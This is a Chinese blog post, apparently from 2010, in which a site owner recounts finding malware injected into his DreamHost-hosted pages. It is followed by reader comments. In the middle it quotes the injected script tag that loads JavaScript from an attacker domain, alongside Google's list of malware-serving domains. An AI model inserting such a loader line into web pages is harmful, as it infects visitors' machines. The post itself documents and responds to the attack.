4月1日中午,有朋友发来邮件: 访问 chedong.com 的页面时;
该网站可能含有恶意软件,有可能会危害您的电脑。
http://www.google.com.hk/interstitial?url=http://www.chedong.com/
到Google的诊断页看了一下:
我们过去 90 天内对此网站上的 2 张网页进行了测试,发现有 1
张网页在未经用户同意的情况下就会将恶意软件下载并安装到用户的机器中。Google 上次访问此网站的日期是
2010-03-31,上次在此网站中发现可疑内容的日期是 2010-03-30。
Malicious software includes 2 exploit(s). Successful infection
resulted in an average of 1 new process(es) on the target machine.
恶意软件托管在 3 个域上,其中包括 surrogaty.uz.ua/, abseconbluedevils.org/, powergym.be/。
2 个域以传播媒介的身份向此网站的访问者散发了恶意软件,其中包括 abseconbluedevils.org/, help2strike.org.ua/。
This site was hosted on 1 network(s) including AS26347 (DREAMHOST).
登录到服务器上:
grep -R powergym *
发现数十个目录缺省页 index.html index.php default.html 全部在3月30日被附加了这样一行script:
script language='JavaScript' src='http://powergym.be/xxxxss36dj.js'
回家后断断续续折腾了2天,终于将大部分目录回滚到了3月30日之前;近期还在和DreamHost联系,查看系统登录日志,查看各个目录下的应用安装情况;
教训:
0 一定要备份:比如使用Amazon的S3服务作为异地备份;
1 系统登录帐号尽量少,减少不必要的风险,定期更换密钥和密码;
2 WordPress目录: 尽量保持自动更新,2.8.5以前的都是有安全漏洞的;
版权声明:可以转载,转载时请务必以超链接形式标明文章 在Dreamhost遭遇挂马: powergym.be 的原始出处和作者信息及本版权声明。
http://www.chedong.com/blog/archives/001424.html
Comments
怎么盯上你了呢?
由: 嘉佑 发表于 2010年04月04日 下午06时17分
最恨网站被挂马
由: 梦 发表于 2010年04月08日 夜间01时26分
呃,基本上跟你的关系不大我认为。
我之前也是用DH的空间,遇到过一个HACK事件,所有的index.*文件全部被篡改了(包含WEB SERVER默认目录的那个index.html也被改了),并且所有者还是root:root。
发邮件,DH承认他们遭遇了安全事件。
由: 21 发表于 2010年04月14日 晚上11时00分
我是箱子,我想买 dreamhost 的空间,不知道博主可以帮我代购吗?
箱子QQ 506958405
由: 箱子 发表于 2010年04月20日 上午10时24分
现在WordPress 2.9.2 版本了。
由: kaigo 发表于 2010年04月20日 下午05时20分
dreamhost很少有,经常会出现宕机行为
由: 博百优 发表于 2010年04月22日 下午03时31分
你用的是虚拟主机吗?我原来用godaddy的也碰到过,但是用vps或独立服务器的话就没碰到过了
由: 子猴 发表于 2010年12月14日 下午04时15分